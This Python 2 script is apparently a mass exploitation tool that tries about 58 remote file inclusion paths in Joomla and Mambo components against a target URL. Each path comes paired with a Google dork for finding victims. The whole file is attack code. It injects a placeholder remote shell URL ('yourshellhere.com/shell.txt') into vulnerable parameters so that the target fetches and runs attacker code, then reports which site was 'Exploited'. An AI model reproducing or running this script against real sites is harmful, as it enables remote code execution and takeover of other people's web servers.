#!/usr/bin/python
# Multi exploit para joomla by  jolmos@buguroo.com
# Implements the 58 joomla exploits sumarized by Mr.aFiR_ on  http://www.exploit-db.com/papers/13633/

import urllib2
import re
import sys


class Exploit:
	def __init__(self,dork,url):
		self.url = url
		self.dork = dork

	def run(self,target,rfishell):
		xplt = self.url
		xplt = xplt.replace('##',rfishell)
		url = '%s%s' % (target,xplt)
		try:
			req = urllib2.urlopen(url)
			data = req.read()
			if data.find('o2ij3oiwudjf') == -1:
				print "[ Failed ] %s" % url
				return False

			print "[ Exploited!! ] %s" % url
			return True
		except:
			print "[ 404 ] %s" % url
			return False
		
		

class MultiExploit:
	def __init__(self):
		self.exploits = []
		self.rfishell = 'http://yourshellhere.com/shell.txt???'
		self.load()

	def load(self):
		self.exploits.append(Exploit('inurl:"com_admin"','/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=##'))
		self.exploits.append(Exploit('inurl:index.php?option=com_simpleboard','/components/com_simpleboard/file_upload.php?sbp=##'))
		self.exploits.append(Exploit('inurl:"com_hashcash"','/components/com_hashcash/server.php?mosConfig_absolute_path=##'))
		self.exploits.append(Exploit('inurl:"com_htmlarea3_xtd-c"','/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=##'))
		self.exploits.append(Exploit('inurl:"com_sitemap"','/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=##'))
		self.exploits.append(Exploit('inurl:"com_performs"','/components/com_performs/performs.php?mosConfig_absolute_path=##'))
		self.exploits.append(Exploit('inurl:"com_forum"','/components/com_forum/download.php?phpbb_root_path=##'))
		self.exploits.append(Exploit('inurl:"com_pccookbook"','/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=##'))
		self.exploits.append(Exploit('inurl:index.php?option=com_extcalendar','/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=##'))
		self.exploits.append(Exploit('inurl:"minibb"','/components/minibb/index.php?absolute_path=##'))
		self.exploits.append(Exploit('inurl:"com_smf"','/components/com_smf/smf.php?mosConfig_absolute_path=##'))
		self.exploits.append(Exploit('inurl:"com_smf"','/modules/mod_calendar.php?absolute_path=##'))
		self.exploits.append(Exploit('inurl:"com_pollxt"','/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=##'))
		self.exploits.append(Exploit('inurl:"com_loudmounth"','/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=##'))
		self.exploits.append(Exploit('inurl:"com_videodb"','/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=##'))
		self.exploits.append(Exploit('inurl:index.php?option=com_pcchess','/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=##'))
		self.exploits.append(Exploit('inurl:"com_multibanners"','/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=##'))
		self.exploits.append(Exploit('inurl:"com_a6mambohelpdesk"','/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=##'))
		self.exploits.append(Exploit('inurl:"com_colophon"','/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=##'))
		self.exploits.append(Exploit('inurl:"com_mgm"','/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=##'))
		self.exploits.append(Exploit('inurl:"com_mambatstaff"','/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=##'))
		self.exploits.append(Exploit('inurl:"com_securityimages"','/components/com_securityimages/configinsert.php?mosConfig_absolute_path=##'))
		self.exploits.append(Exploit('inurl:"com_securityimages"','/components/com_securityimages/lang.php?mosConfig_absolute_path=##'))
		self.exploits.append(Exploit('inurl:"com_artlinks"','/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=##'))
		self.exploits.append(Exploit('inurl:"com_galleria"','/components/com_galleria/galleria.html.php?mosConfig_absolute_path=##'))
		self.exploits.append(Exploit('inurl:"com_akocomment"','/akocomments.php?mosConfig_absolute_path=##'))
		self.exploits.append(Exploit('inurl:"com_cropimage"','/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=##'))
		self.exploits.append(Exploit('inurl:"com_kochsuite"','/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=##'))
		self.exploits.append(Exploit('inurl:"com_comprofiler"','/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=##'))
		self.exploits.append(Exploit('inurl:"com_zoom"','/components/com_zoom/classes/fs_unix.php?mosConfig_absolute_path=##'))
		self.exploits.append(Exploit('inurl:"com_zoom"','/components/com_zoom/includes/database.php?mosConfig_absolute_path=##'))
		self.exploits.append(Exploit('inurl:"com_serverstat"','/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=##'))
		self.exploits.append(Exploit('inurl:"com_fm"','/components/com_fm/fm.install.php?lm_absolute_path=##'))
		self.exploits.append(Exploit('inurl:com_mambelfish','/administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=##'))
		self.exploits.append(Exploit('inurl:com_lmo','/components/com_lmo/lmo.php?mosConfig_absolute_path=##'))
		self.exploits.append(Exploit('inurl:com_linkdirectory','/components/com_lmo/lmo.php?mosConfig_absolute_path=##'))
		self.exploits.append(Exploit('inurl:com_linkdirectory','/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=##'))
		self.exploits.append(Exploit('inurl:com_mtree','/components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=##'))
		self.exploits.append(Exploit('inurl:com_jim','/administrator/components/com_jim/install.jim.php?mosConfig_absolute_path=##'))
		self.exploits.append(Exploit('inurl:com_webring','/administrator/components/com_webring/admin.webring.docs.php?component_dir=##'))
		self.exploits.append(Exploit('inurl:com_remository','/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path='))
		self.exploits.append(Exploit('inurl:com_babackup','/administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=##'))
		self.exploits.append(Exploit('inurl:com_lurm_constructor','/administrator/components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=##'))
		self.exploits.append(Exploit('inurl:com_mambowiki','/components/com_mambowiki/MamboLogin.php?IP=##'))
		self.exploits.append(Exploit('inurl:com_a6mambocredits','/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=##'))
		self.exploits.append(Exploit('inurl:com_phpshop','/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=##'))
		self.exploits.append(Exploit('inurl:com_cpg','/components/com_cpg/cpg.php?mosConfig_absolute_path=##'))
		self.exploits.append(Exploit('inurl:com_moodle','/components/com_moodle/moodle.php?mosConfig_absolute_path=##'))
		self.exploits.append(Exploit('inurl:com_extended_registration','/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=##'))
		self.exploits.append(Exploit('inurl:com_mospray','/components/com_mospray/scripts/admin.php?basedir=##'))
		self.exploits.append(Exploit('inurl:com_bayesiannaivefilter','/administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=##'))
		self.exploits.append(Exploit('inurl:com_uhp','/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=##'))
		self.exploits.append(Exploit('inurl:com_peoplebook','/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=##'))
		self.exploits.append(Exploit('inurl:com_mmp','/administrator/components/com_mmp/help.mmp.php?mosConfig_absolute_path=##'))
		self.exploits.append(Exploit('inurl:com_reporter','/components/com_reporter/processor/reporter.sql.php?mosConfig_absolute_path=##'))
		self.exploits.append(Exploit('inurl:com_madeira','/components/com_madeira/img.php?url=##'))
		self.exploits.append(Exploit('inurl:com_jd-wiki','/components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=##'))
		self.exploits.append(Exploit('inurl:com_bsq_sitestats','/components/com_bsq_sitestats/external/rssfeed.php?baseDir=##'))
		self.exploits.append(Exploit('inurl:com_bsq_sitestats','/com_bsq_sitestats/external/rssfeed.php?baseDir=##'))

	def launch(self,target):
		for xplt in self.exploits:
			if xplt.run(target,self.rfishell):
				return


if __name__ == '__main__':
	if (len(sys.argv) != 2):
		print 'usage: %s http://vulnerable.com/joomla/'
		sys.exit(1)

	me = MultiExploit()
	me.launch(sys.argv[1])